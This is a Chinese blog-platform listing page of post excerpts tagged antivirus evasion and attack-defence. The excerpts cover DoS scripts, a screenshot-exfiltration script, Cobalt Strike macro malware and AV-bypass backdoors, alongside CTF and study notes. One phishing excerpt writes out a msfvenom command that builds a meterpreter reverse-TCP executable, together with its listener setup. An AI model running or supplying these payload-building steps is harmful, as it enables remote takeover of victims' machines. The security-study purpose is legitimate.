免杀攻防

Python黑客攻防(十六)编写Dos脚本,进行简单攻击演示

注:本篇文章为个人学习笔记仅供学习交流,请勿用于非法用途。转载须标明出处。欢迎关注微信公众号:黑客帮获取更多干货。Dos攻击简介DOS:中文名称是拒绝服务,一切能引起DOS行为的攻击都被称为DOS攻击。该攻击的效果是使得计算机或网络无法提供正常的服务。常见的DOS攻击有针对计算机网络带宽和连通性的攻击。DOS是单机于单机之间的攻击。Dos攻击原理首先攻击者向被攻击的服务器发送大量的虚假IP请求,被
肥胖喵·2023-10-12 16:39

Python黑客攻防(一)屏幕窃取

注:本篇文章仅供学习交流,请勿用于非法用途,否则后果自负。首发于微信公众号:黑客帮,大神勿喷。原理:使用SMTP协议及截图函数完成屏幕截取并自动发送到指定邮箱。步骤:1.邮箱开启SMTP服务,记住授权码。登录网页版邮箱->设置->账户,找到SMTP服务将其开启,记住授权码。2.代码解析。截图函数time.sleep()表示休眠这里为5,表示代码暂停5秒,该函数每5秒就截一张图在D盘中覆盖保存。#截
肥胖喵·2023-10-12 16:09

网络安全(黑客技术)—自学手册

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
羊村最强沸羊羊·2023-10-12 14:46

IIS解析漏洞

环境搭建参考:奇安信攻防社区-IIS渗透合集常见的解析漏洞:IIS5.x/6.0解析漏洞IIS7.0/IIS7.5/Nginx<0.8.3畸形解析漏洞Nginx<8.03空字节代码执行漏洞Apache解析漏洞
- Time·2023-10-12 05:48

Android 免杀教程

免杀练习两年半目录msfvenom自动生成自带免杀工具免杀Thefatratvenom工具小记加壳源码免杀加壳源码混淆数据通信对抗反编译反编译工具崩溃ZIP文件格式对抗AndroidManifest.xml
渗透测试老鸟-九青·2023-10-11 21:07

攻防世界】command_execution

题目再现小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。题目分析本题目说没有写WAF,然后可以执行Linux经典代码PING,我猜测到服务器不会校验我所注入的代码,我利用串行执行符&&进行测试,没想到可以执行Linux代码。思路分析既然可以执行远端代码,我便想看看这台服务器中,都存在那些好东西,使用Web浏览器输入命令显然不够方便,我计划使用Python封装一个
不喝水的鱼儿·2023-10-11 17:02

网络安全技术学习之网络安全概述

注:本文内容全部参考自清华大学出版社的《网络攻防技术与实战》(郭帆编著)文章目录1.1网络安全的定义1.2网络系统面临的安全威胁1.2.1恶意代码1.2.2远程入侵1.2.3拒绝服务攻击1.2.4身份假冒
帽子歪了·2023-10-11 16:41

我们仨的碎碎念之每天都在斗智斗勇~

在我即将脱口而出:做家务使我快乐的0.01秒,我意识到这到底是送命题,还是陷阱题,于是我决定笑而不语[嘘][嘘][嘘]39.今晚老陈和攸宝又来了一场作业与练习的攻防战,最终老陈动之以情,晓之以理完胜~
landonchen·2023-10-11 13:09

网络安全-防守-护网

护网目标通过防守工作与技术方案,做好“护网”前期准备、安全自查整改、攻防演练和演练总结等各阶段相关工作。
fo安方·2023-10-11 07:10

API攻防-接口安全&SOAP&OpenAPI&RESTful&分类特征导入&项目联动检测

文章目录概述什么是接口?1、API分类特征SOAP-WSDLWebservices三种基本元素:OpenApi-SwaggerUISpringbootActuator2、API检测流程Method:请求方法URL:唯一资源定位符Params:请求参数Authorization:认证方式Headers:请求消息头3、API检测项目ReadyAPIPostman联动XrayAPIKITBurp插件补一
今天是 几 号·2023-10-11 05:06

学习黑客需要先了解哪些知识,零基础怎样掌握网络安全知识体系

未知攻,焉知防,攻防兼备,是为网安之道。本文就给大家讲讲普通人如何通过系统性的学习,掌握网络安全体系的内容。大家要排除关于黑客认知的几个误区。
教IT的小强·2023-10-10 21:29

小白网络安全学习手册—黑客

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-10 21:57

网络安全(黑客)自学

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-10 21:27

网络安全(骇客)—技术学习

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-10 20:51

Web攻防--Java_SQL注入--XXE注入-- SSTI模板注入--SPEL表达式注入

目录标题预编译Java_JDBC注入Java_MyBatis注入XXE注入SSTI模板注入SPEL表达式注入预编译编译器在编译sql语句时,会依次进行词法分析、语法分析、语义分析等操作,预编译技术会让数据库跳过编译阶段,也就无法就进行词法分析,关键字不会被拆开,注入语句也就不会被识别为SQL的关键字,从而防止恶意注入语句改变原有SQL语句本身逻辑。Java_JDBC注入在使用JDBC进行数据库操作
SuperMan529·2023-10-10 17:03

攻防世界第六题weak_auth

这道题要用到的有burp以及burp的内置浏览器进入这个题目的环境后看到的就是一个登录界面但我们也不知道账号和密码,那就瞎搞一个呗,反正瞎搞又不花钱。搞完之后看到他提示账号是admin那这道题是用暴力破解,那就大力出奇迹。开启抓包后输入账号admin密码还是瞎搞,我这里输入的密码是123456789在抓包界面也就能看到我们输入的账号和密码了要用到暴力破解,所以在action中选择发送到intrud
With Order @!147·2023-10-10 06:23

红队专题-Cobalt strike4.5二次开发

红队专题招募六边形战士队员原版CS反编译破解jar包反编译拔掉暗桩初始环境效果招募六边形战士队员一起学习代码审计、安全开发、web攻防、逆向等。。。
amingMM·2023-10-10 02:17

CTF之CTF(夺旗赛)介绍

CTF的比赛模式主要包括解题模式(Jeopardy)、攻防模式(Attack-Defense)和混
wenzhongxiang·2023-10-10 02:15

sqli-lab 1-16通关随笔记

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档SQL注入学习sqli-labs靶场通关1~16前段时间大概学了一遍内网,免杀正好来将web这块重新复习一遍由于是直接刷关所以只是让关卡报出注入点其余的都没搞
qianpd·2023-10-09 18:23

小白自学笔记—网络安全(黑客笔记)

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-09 17:07

网络安全(黑客技术)—小白自学笔记

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-10-09 14:16

红队攻击:初始访问

公众号:安全攻防渗透0x01windows-多账户同时登陆描述攻击者可能会获取并滥用本地帐户的凭据,以获取初始访问权限,持久性,权限提升或防御逃避。
安全攻防渗透·2023-10-09 14:59

常用工具

本项目集成了全网优秀的开源攻防武器项目,包含信息收集工具(自动化利用工具、资产发现工具、目录扫描工具、子域名收集工具、指纹识别工具、端口扫描工具、各种插件....etc...)
PeiSylon·2023-10-09 14:53

2023 10月2日 至 10 月8日学习总结

PicDownpython反弹shellproc/self目录的信息_双层小牛堡的博客-CSDN博客[CISCN2019华北赛区Day1Web5]CyberPunk二次报错注入_双层小牛堡的博客-CSDN博客攻防世界
双层小牛堡·2023-10-09 14:51

网络安全工具合计(攻防工具)

目录All-Defense-Tool免责声明半/全自动化利用工具信息收集工具资产发现工具子域名收集工具目录扫描工具指纹识别工具端口扫描工具Burp插件浏览器插件邮箱&钓鱼社工个人信息收集类APP/公众号/小程序相关工具常用小工具漏洞利用工具漏洞扫描框架/工具中间件/应用漏洞利用工具重点cms利用工具信息泄露利用工具数据库利用工具爆破利用工具全网字典收集常规漏洞利用工具反序列化利用工具代码审计辅助工
第三个夏末.·2023-10-09 14:16

iOS Anti-Debug技术探讨

前言移动平台攻防对抗技术的发展基本是沿着PC端发展轨迹在前进,从windows平台上的加壳到Android平台的APK加固,相信ipa的加固也已经不远了;windows平台下从ring3层到ring0层的反调试技术已经非常成熟
l3gi0n·2023-10-09 11:10

忙碌的12月,漫画暖人心

最近在看《黑子的篮球》后面15册,看到诚凛的进攻之矛与阳泉的防御之盾的大攻防,甚是精彩;还有《银魂》,我觉得这是一部被严重低估的作品,内容真的很搞笑,很适合茶余饭后的吐槽。
佳扬的天空·2023-10-09 08:29

学习笔记-公有云安全

csp_security_mistakes-Cloudserviceprovidersecuritymistakes相关文章云环境下密钥泄露导致的安全问题关于云安全渗透实录|ThreatSource鸟哥:浅谈云安全技术以及安全架构亮点【云安全】华为云OBS对象存储攻防
C-haidragon·2023-10-09 07:52

2021-8-29《内网安全攻防》第一章内网基础知识

欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注这是MS08067实验室的作品,我看的过程中做了一些笔记,算是复习+学习吧。
热热的雨夜·2023-10-08 23:03

【内网学习】1.内网相关基础知识

目录0x01.内网0x02.工作组0x03域3.1域控制器3.2域中的几个环境3.3活动目录3.4安全域的划分3.5域中计算机的分类3.6域内权限前言:买了《内网安全攻防》这本书已经很久了,但是迟迟没有开始阅读
gclome·2023-10-08 23:33

具有实战功能演变成注重养生功能的太极拳!缘何?

李连杰练的,是以传统武术的手眼身法步为基础,含有武术攻防特点的一种竞技体育项目,它比的是身体的灵活性和协调性,套路的连续性和准确性,并通过动作的高飘险绝,带给人畅快淋漓的美感。
木渎太极拳馆·2023-10-08 13:59

网络安全:CSRF攻防原理

一、如何发起一次CSRF攻击原理:CSRF的本质实际上是利用了Cookie会自动在请求中携带的特性,通过伪造请求来执行恶意操作。1、目标网站信息:接口地址:https://victim.com/change-password请求类型:get/post接受参数:password2、编写一个网页document.forms[0].submit();3、诱导用户打开我们的网页用户在已经登录了https:
大佬,咋整啊·2023-10-08 10:42

网络攻防备课笔记

从“踩点”到“创建后门”的攻击流程踩点:攻击者在实施攻击前对目标进行初步的探索和调查的过程,包括收集目标的IP地址、开放的端口、服务版本、可能的漏洞等信息。扫描:使用工具如Nmap、Masscan等对目标进行端口扫描,找出开放的端口和对应的服务。漏洞探测:在知道目标系统的服务和版本后,攻击者会查找可能存在的漏洞,使用如Nessus、OpenVAS等工具进行自动化的漏洞扫描。利用漏洞:发现漏洞后,攻
Joy T·2023-10-08 08:40

攻防世界-T1 Training-WWW-Robots

文章目录步骤1步骤二结束语步骤1看到文本——>提取有效信息——>利用有效信息文本:Inthislittletrainingchallenge,youaregoingtolearnabouttheRobots_exclusion_standard.Therobots.txtfileisusedbywebcrawlerstocheckiftheyareallowedtocrawlandindexyou
hk-hkl·2023-10-08 05:03

网络安全--入侵阶段介绍

1.2漏洞扫描2.攻击阶段2.1Web应用入侵2.2绕过IDS、防火墙及蜜罐2.3Web服务器入侵2.4拒绝服务2.5缓冲区溢出3.后攻击阶段3.1权限提升3.2权限维持课程目标:这节课我们来介绍安全攻防中的入侵阶段
精雕细琢方成瑜·2023-10-08 05:28

ASO有多难?

有人说,一入ASO深似海;有人说,ASO优化浅显尽知;还有人说,关于ASO的一切,尽可随缘;最后一位老者说,ASO一途实则深浅难测,你看,这一厢苹果算法变幻多端,另一厢竞品之间攻防无序,刷差评、恶意中伤
knjbvyxasg·2023-10-07 19:36

防御第五次作业

4.恶意软件的免杀技术有哪些?5.反病毒技术有哪些?6.反病毒网关的工作原理是什么?7.反病毒网关的工作过程是什么?8.反病毒网关的配置流程是什么?1.什么是恶意软件?
hbw_·2023-10-07 19:19

Cobalt-Strike Office宏利用与免杀

1.打开Cobalt-Strike生产Office宏病毒。首先需要设置监听器、因为钓鱼的目标比较单纯,在这里就不采用域前置技术。然后使用攻击模块,生产Office宏病毒。设置好监听器。生成宏病毒2.将宏病毒放入word首先打开Word,在审阅中编辑宏:创建新的宏:将生成的宏病毒放入MicrosoftWord目录下的ThisDocument,注意如果宏位置写错了很容易报错。按下Ctrl+S,将文件保
分发吧·2023-10-07 18:11

CobaltStrike简易免杀后门制作

事先声明:本技术文章仅限用于学习和研究,不得将上述内容用于商业或者非法用途,否则,一切后果请您自负。本博客的技术来源于作者网络上所学。您在技术复现前必须得到攻击目标本人的同意,并且在复现结束后从您的电脑中彻底删除相关内容。如有违法事件发生与作者本人无关。一.平台搭建启动CS服务器命令./teamserver服务器IP(实际要用公网服务器IP)密码客户端连接若连接不成功,需要检测是否开启50050端
天津曲艺团·2023-10-07 18:40

钓鱼篇-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS

RLO伪装图片执行利用msf生成木马x.exemsfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.96.128LPORT=4444-fexe-ox.exeMetasploit打开反向监听的命令useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcp下面利用RLO对x.
无名安全·2023-10-07 18:40

【黑客免杀攻防】读书笔记1 - 初级免杀基础理论(反病毒软件特征码提取介绍、免杀原理、壳)...

基础篇初级免杀技术第1章变脸免杀是一种反杀毒技术。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为
weixin_30642869·2023-10-07 18:08

绕过杀毒软件,免杀木马制作

绕过杀毒软件,免杀木马制作(以AVGAntiSpyware杀毒软件为例)一、将Sever.exe打开,分块生成100个文件二、使用AVGAntiSpyware查杀生成的文件,再二次处理,重复这个过程,直到缩小到很小的范围
youhao108·2023-10-07 18:37

远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)

本专题文章导航1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2.远控免杀专题(2)-msfvenom隐藏的参数:https
Ms08067安全实验室·2023-10-07 18:37

远控免杀专题(22)-SpookFlare免杀

转载:https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA免杀能力一览表几点说明:1、上表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
p0inter·2023-10-07 18:36

社会工程学 | office宏分离免杀及应急处置

Office宏分离免杀的方式是在目标用户的office开启宏功能的前提下,诱骗其使用office办公软件打开文档,通过加载远程的恶意宏代码,达到控制目标主机权限的目的。
betasec·2023-10-07 18:06

远控免杀专题(16)-Unicorn免杀

0x01免杀能力一览表几点说明:1、上表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
p0inter·2023-10-07 18:06

免杀对抗-反沙盒+反调试

反VT-沙盒检测-Go&Python介绍:近年来,各类恶意软件层出不穷,反病毒软件也更新了各种检测方案以提高检率。其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说沙盒就是为运行中的程序提供的隔离环境。为了逃避沙箱/安全人员的检测,恶意软件使用了各类识别沙箱/虚拟机的技术,用于判断自身程序是否运行在沙箱/虚拟机中。go语言1.使用GoLan
xiaoheizi安全·2023-10-07 18:36

office钓鱼免杀宏的制作

office钓鱼免杀宏的制作由于国内近些年来,红蓝对抗的升级,各类hvv,重保,防守方上各种杀软,edr,防御手段层出不穷,不会免杀真的是欲哭无泪,今天带来EvilClippy恶意文档助手,对office
Sword-heart·2023-10-07 18:06

免杀入门学习---------2019.8.27

这篇随笔的大部分内容来自《黑客免杀攻防》第一章说的免杀的历史,点了一下免杀和Rootkit的区别。Rootkit的词条介绍当然,一个菜鸟怎么会理解呢,只能默默地记一下,接受了。
Looun·2023-10-07 18:05

免杀入门(基础理论)

免杀理论基础本文主要为免杀入门的基础理论笔记,前几年写下的找到正好发出来,因审核需要删除部分内容,有免杀基础和一定实操经验人士可以跳过本文概念免杀全称为反杀毒技术AntiAnti-Virus简称“免杀
S1aine·2023-10-07 18:35
上一页 19 20 21 22 23 24 25 26 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他